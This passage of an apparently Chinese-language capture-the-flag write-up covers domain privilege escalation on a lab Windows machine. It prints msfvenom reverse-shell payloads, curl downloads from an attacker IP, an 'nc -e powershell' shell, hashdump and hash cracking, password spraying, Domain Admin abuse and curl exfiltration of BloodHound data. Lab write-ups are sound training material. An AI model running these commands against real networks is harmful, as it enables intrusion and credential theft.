Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51';$passwd = $securepasswd | ConvertTo-SecureString;$creds = New-Object System.Management.Automation.PSCredential("acute\jmorgan", $passwd);Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds}
The term 'ConvertTo-SecureString' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (ConvertTo-SecureString:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVER

The term 'New-Object' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (New-Object:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVER

The term 'Invoke-Command' is not recognized as the name of a cmdlet, function, script file, or operable program. Check
the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (Invoke-Command:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVER

虽然限制了比较多,但是试了下直接执行wm.ps1却可以的

那就简单,只需要修改掉wm.ps1中的Get-Volume,再执行wm.ps1从而相当于让jmorgan执行恶意载荷就可以.

再生成一个载荷,这个个人习惯问题,不太喜欢俩载荷用都走同一个端口,因为sessions时候第一眼习惯看端口区分(x.

1
2
3
4
5
6
7
8
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=10089 -f exe -o a.exe
Warning: KRB5CCNAME environment variable not supported - unsetting
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: a.exe

改一下监听,后台运行

1
2
3
4
5
6
7
msf6 exploit(multi/handler) > set LPORT 10089
LPORT => 10089
[*] Started reverse TCP handler on 10.10.16.4:10089
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >

这里用edavies的shell把载荷先丢进去

1
curl 10.10.16.4/a.exe -o C:/utils/t.exe

然后修改atsserverimonkswm.ps1脚本内容,用C:\Utils\t.exe替换Get-Volume,使得执行wm.ps1时直接执行msf载荷

1
2
3
4
5
PS C:\Utils> $passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsplainText -Force

PS C:\Utils> $cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd)

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { (Get-Content -Path ~/desktop/wm.ps1).Replace('Get-Volume', 'C:\Utils\t.exe') | Set-Content -Path ~/desktop/wm.ps1 }

然后这里有点怪,执行了wm.ps1msf却收不到客户端连接。

1
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { C:/Utils/wm.ps1 }

然后又重启了下机器,丢了个nc上去

1
curl 10.10.16.4/nc64.exe -o C:/Utils/b.exe
1
2
3
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { (Get-Content -Path C:\Users\imonks\desktop\wm.ps1).Replace('Get-Volume','C:\Utils\a.exe 10.10.16.4 10088 -e powershell')| Set-Content -Path C:\Users\imonks\desktop\wm.ps1}

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { C:\Users\imonks\desktop\wm.ps1 }

反而能收到shell,奇怪呢

1
2
3
4
5
6
7
8
9
10
11
12
─$ nc -lvnp 10088  
listening on [any] 10088 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.145] 49840
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\jmorgan\Documents>
PS C:\Users\jmorgan\Documents> whoami
whoami
acute\jmorgan

查看当前用户权限,是主机administrators组里的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
PS C:\Users\administrator.ACUTE\downloads> whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID
============= ==============================================
acute\jmorgan S-1-5-21-1786406921-1914792807-2072761762-1108


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

用nc这个执行刚才的msf载荷弹个shell

1
2
3
4
5
6
PS C:\utils> start-job -scriptblock {C:\utils\t.exe}
start-job -scriptblock {C:\utils\t.exe}

Id Name PSJobTypeName State HasMoreData Location Command
-- ---- ------------- ----- ----------- -------- -------
1 Job1 BackgroundJob Running True localhost C:\utils\t.exe

这次接到shell了

1
2
3
4
5
6
7
8
9
>sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
55 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.4:10087 -> 10.10.11.145:49877 (172.16.22.2)
56 meterpreter x64/windows ACUTE\jmorgan @ ACUTE-PC01 10.10.16.4:10089 -> 10.10.11.145:49792 (172.16.22.2)

to awallace

这里搜了一圈jmorgan用户上没有任何有价值的东西,切终端抓hash

1
2
3
4
5
6
7
8
>sessions 56

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::

拖去跑密码,得到一个弱口令

1
2
3
4
5
6
7
8
9
10
11
12
└─$ hashcat hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

1000 | NTLM | Operating System

a29f7623fd11550def0192de9246f46b:Password@123

获取当前域内用户,需要在域控上执行

1
2
3
4
5
6
7
8
9
10
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net users /domain}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net users /domain}

User accounts for \\

-------------------------------------------------------------------------------
Administrator awallace chall
edavies Guest imonks
jmorgan krbtgt lhopkins
The command completed with one or more errors.

这里想直接对着172.16.22.1喷密码,所以加一下路由先

1
2
3
4
5
6
7
8
9
10
11
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
60 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.8:10087 -> 10.10.11.145:49878 (172.16.22.2)

msf6 exploit(multi/handler) > route add 172.16.22.0 255.255.255.0 60
[*] Route added

做一下字典先

1
2
3
4
5
6
7
8
9
10
└─$ grep -Eo '\w+' userlistt
Administrator
awallace
chall
edavies
Guest
imonks
jmorgan
krbtgt
lhopkins
1
2
msf6 auxiliary(scanner/smb/smb_login) > set user_file userlistt
user_file => userlistt

发现直接跑好像有点问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
sf6 auxiliary(scanner/smb/smb_login) > set SMBDomain 'acute.local'
SMBDomain => acute.local
msf6 auxiliary(scanner/smb/smb_login) > rerun
[*] Reloading module...
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session

[*] 172.16.22.1:445 - 172.16.22.1:445 - Starting SMB login bruteforce
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\Administrator:Password@123',
[!] 172.16.22.1:445 - No active DB -- Credential data will not be saved!
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\awallace:Password@123',
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\chall:Password@123',
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\edavies:Password@123',
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\Guest:Password@123',
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\imonks:Password@123',
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\jmorgan:Password@123',

还是手动invoke-command挨个试了

好消息是awallace就撞到了,没有浪费时间

1
2
3
4
5
$passwd = ConvertTo-SecureString "Password@123" -AsplainText -Force

$cred = New-Object System.Management.Automation.PSCredential("acute\awallace",$passwd)

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { ls ~ }
1
2
3
4
5
6
7
8
9
10
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net user /domain
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net user /domain}

User accounts for \\

-------------------------------------------------------------------------------
Administrator awallace chall
edavies Guest imonks
jmorgan krbtgt lhopkins
The command completed with one or more errors.

看了下权限,引起注意的是当前用户在一个Managers组里,是个自定义组

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {whoami /all}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {whoami /all}

USER INFORMATION
----------------

User Name SID
============== ==============================================
acute\awallace S-1-5-21-1786406921-1914792807-2072761762-1104


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
ACUTE\Managers Group S-1-5-21-1786406921-1914792807-2072761762-1111 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

然后再搜点,但这次用户的家目录下没有东西了。

因为这个用户的组别比较特殊,所以应该是给了啥特殊权限

这里到Program Files看到有个keepmeon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock { ls "\Program Files"}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { ls "\Program Files"}


Directory: C:\Program Files


Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d----- 21/12/2021 00:04 common files ATSSERVER
d----- 21/12/2021 00:11 Hyper-V ATSSERVER
d----- 15/09/2018 08:12 internet explorer ATSSERVER
d----- 01/02/2022 19:41 keepmeon ATSSERVER
d----- 21/12/2021 00:04 VMware ATSSERVER
d----- 20/12/2021 21:19 Windows Defender ATSSERVER
d----- 20/12/2021 21:12 Windows Defender Advanced Threat ATSSERVER
Protection
d----- 21/12/2021 14:13 WindowsPowerShell ATSSERVER

“让他继续”说是(x

alt text

其中包含了一个文件keepmeon.bat

1
2
3
4
5
6
7
8
9
10
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock { ls "\Program Files\keepmeon"}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { ls "\Program Files\keepmeon"}


Directory: C:\Program Files\keepmeon


Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER

查看内容是个脚本,会执行所有的bat后缀的文件

1
2
3
4
5
6
7
8
9
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {cat "\Program Files\keepmeon\keepmeon.bat"}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {cat "\Program Files\keepmeon\keepmeon.bat"}

REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)

这里说每过五分钟会执行一次,而且看样子是是由Lois来执行

REM This is run every 5 minutes. For Lois use ONLY

那先看下lois是啥用户,这里先列出所有用户然后挨个看下信息,找找lois

1
2
3
4
5
6
7
8
9
10
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net users /domain}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net users /domain}

User accounts for \\

-------------------------------------------------------------------------------
Administrator awallace chall
edavies Guest imonks
jmorgan krbtgt lhopkins
The command completed with one or more errors.

直到lhopkins找到了这个b,但是这个bLois只是个普通域用户..

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net user lhopkins  /domain}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net user lhopkins /domain}
User name lhopkins
Full Name Lois Hopkins
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 21/12/2021 14:51:53
Password expires Never
Password changeable 22/12/2021 14:51:53
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 14/03/2025 13:38:26

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.

不过还记得文档里记载的这段话:

只有lois有权限修改组成员,要改的话联系他,只有lois可以成为site admin(站点管理员)

Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin.

好奇这个site admin代表的啥,看了下组

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net groups /domain}

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Managers
*Protected Users
*Read-only Domain Controllers
*Schema Admins
*Site_Admin
The command completed with one or more errors

其中有一个*Site_Admin组别

1
2
3
4
5
6
7
8
9
PS C:\utils>  Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net group Site_Admin /domain}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net group Site_Admin /domain}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Members

-------------------------------------------------------------------------------
The command completed successfully.

留了一个备注给这个组,只有紧急情况才让用这个组,然后这个组可以操作domain admins说是

Only in the event of emergencies is this to be populated. This has access to Domain Admin group

梳理一下手里的几个掌握的点

  • 1.keepmeon.bat每过5分钟Lois可能会执行这个脚本,来用它执行其他bat
  • 2.只有Lois才可以成为site admin
  • 3.site_admin组可以操作domain admins

虽然lhopkins账户是普通的domain user,但我怀疑她每过5分钟都会给赋予site admin权限,然后执行bat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net user lhopkins  /domain}

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net user lhopkins /domain}
User name lhopkins
Full Name Lois Hopkins
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 21/12/2021 14:51:53
Password expires Never
Password changeable 22/12/2021 14:51:53
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 14/03/2025 13:58:26

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.

PS C:\utils>
PS C:\utils> date
date

14 March 2025 14:01:27

所以我蹲着等他5分钟上线抓他的用户组别,然后等了5分钟之后他的组别还是只有domain users,所以这个用户并不会被赋予site_admin权限。

doc中又明确说了lois是能更改用户的组别,所以干脆直接尝试下。

于是我写了个bat,因为他每过5分钟执行bat,把当前知道凭证且能访问atsserver的用户加个组测测,这里用awallace 、imonks都可以,我选的awallace

写了仨bat

1
2
3
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\as.bat" -Value "net group site_admin awallace /add /domain" }
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\asss.bat" -Value "net group 'domain admins' awallace /add /domain" }
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\ass.bat" -Value "net group 'key admins' awallace /add /domain" }

等了一会之后,发现awallace被加了个Site_Admin,说明bak是运行了,但奇怪的是加domain adminskey admins的却没执行似的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {  net user awallace /domain}
User name awallace
Full Name Aileen Wallace
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 21/12/2021 14:50:36
Password expires Never
Password changeable 22/12/2021 14:50:36
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 14/03/2025 14:29:59

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *Managers
*Site_Admin
The command completed successfully.

猜测这个lois用户应该是被加了dacl之类的奇怪权限,允许他添加用户至site_admin组,而又没有其他组的添加权限

试了一会发现他权限会刷新,赶紧趁着还有site_admin权限,加个用户

1
2
Invoke-Command -ComputerName ATSSERVER -Credential $cred  -ConfigurationName dc_manage -scriptblock {net user flower Password@123 /add /domain} 
The command completed successfully.
1
Invoke-Command -ComputerName ATSSERVER -Credential $cred  -ConfigurationName dc_manage -scriptblock { net group "domain admins" flower /add /domain }

然后用新加的用户执行命令时候就不用带-ConfigurationName了,不然也会报权限不足

1
2
3
4
5
6
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred  -ScriptBlock { ls ~ }
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls ~ }
[ATSSERVER] Connecting to remote server ATSSERVER failed with the following error message : Access is denied. For more
information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (ATSSERVER:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken

登录执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PS C:\utils> $passwd = ConvertTo-SecureString "Password@123" -AsplainText -Force
$passwd = ConvertTo-SecureString "Password@123" -AsplainText -Force
PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential("acute\flower",$passwd)
$cred = New-Object System.Management.Automation.PSCredential("acute\flower",$passwd)
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ScriptBlock { ls ~ }
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ScriptBlock { ls ~ }

Directory: C:\Users\flower

Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d-r--- 15/09/2018 08:12 Desktop ATSSERVER
d-r--- 11/03/2025 15:10 Documents ATSSERVER
d-r--- 15/09/2018 08:12 Downloads ATSSERVER
d-r--- 15/09/2018 08:12 Favorites ATSSERVER
d-r--- 15/09/2018 08:12 Links ATSSERVER
d-r--- 15/09/2018 08:12 Music ATSSERVER
d-r--- 15/09/2018 08:12 Pictures ATSSERVER
d----- 15/09/2018 08:12 Saved Games ATSSERVER
d-r--- 15/09/2018 08:12 Videos ATSSERVER

拿一下flag

1
2
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { cat \users\administrator\desktop\root*}
283d1a4d4afc079410a74a9f5529e413

过了一会发现权限又被刷新了,真服了。

等了一会又拿到权限,这次直接用awallace用户了,还是要注意一样的问题,高权之后不需要再只定ConfigurationName了,不然会限制自己执行的命令。

1
2
3
4
5
6
7
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock { curl 10.10.16.8/nc64.exe -o C:/a.exe}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { curl 10.10.16.8/nc64.exe -o C:/a.exe}
The term 'curl.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (curl.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVER

传个nc到ATSSERVER

1
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred  -ScriptBlock { curl 10.10.16.8/nc64.exe -o C:/a.exe}

执行

1
PS C:\utils>Invoke-Command -ComputerName ATSSERVER -Credential $cred  -ScriptBlock { C:/a.exe 10.10.16.8 10088 -e powershell}

终于拿到ATSSERVER机器上的shell

1
2
3
4
5
6
7
8
9
─$ nc -lvnp 10088
listening on [any] 10088 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 57496
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\awallace\Documents> whoami

acute\awallace

进来之后看389是开着的外面却连不到,遛个狗看下这个破域到底啥情况

1
2
3
4
PS C:\Users\awallace\Documents> netstat -ano|findstr 389
netstat -ano|findstr 389
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 680
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2444
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
curl 10.10.16.8/SharpHound.exe -o SharpHound.exe
PS C:\Users\awallace\Documents> .\SharpHound.exe
.\SharpHound.exe
2025-03-11T15:38:19.5992713+00:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2025-03-11T15:38:19.6773937+00:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-03-11T15:38:19.6930183+00:00|INFORMATION|Initializing SharpHound at 15:38 on 11/03/2025
2025-03-11T15:38:19.7867734+00:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for acute.local : ATSSERVER.acute.local
2025-03-11T15:38:19.8023986+00:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-03-11T15:38:19.8962192+00:00|INFORMATION|Beginning LDAP search for acute.local
2025-03-11T15:38:19.9117741+00:00|INFORMATION|Producer has finished, closing LDAP channel
2025-03-11T15:38:19.9117741+00:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-03-11T15:38:50.2656371+00:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2025-03-11T15:39:03.4265787+00:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2025-03-11T15:39:03.4422041+00:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-03-11T15:39:03.4890789+00:00|INFORMATION|Status: 113 objects finished (+113 2.627907)/s -- Using 43 MB RAM
2025-03-11T15:39:03.4890789+00:00|INFORMATION|Enumeration finished in 00:00:43.6059014
2025-03-11T15:39:03.5515810+00:00|INFORMATION|Saving cache with stats: 72 ID to type mappings.
75 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2025-03-11T15:39:03.5515810+00:00|INFORMATION|SharpHound Enumeration Completed at 15:39 on 11/03/2025! Happy Graphing!

传出去

1
2
3
4
5
PS C:\Users\awallace\Documents> cmd /c curl -T ./20250311153902_BloodHound.zip  10.10.16.8:81
cmd /c curl -T ./20250311153902_BloodHound.zip 10.10.16.8:81
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 13348 0 0 100 13348 0 2832 0:00:04 0:00:04 --:--:-- 2832
1
2
3
└─$ nc -lvnp 81 > blood.zip  
listening on [any] 81 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 57555

再删一下req带的的头信息

导进狗里,我倒要看看这个lois是什么东西

alt text

找到lhopkins,可恶居然是对site_admingenericAll,给他baby完辽。

alt text

再看site_admin,这位更是domain admins儿子,那没事了

alt text

lhopkinssite_admingenericAll,这也就说得通为啥他只能加用户到site_admin里了。


不错的靶机,但是靶机作者最后的操作太傻逼了,而且给留的lois相关讯息也是看的一团雾水很容易就走歪了,一半靠猜,太弱智了.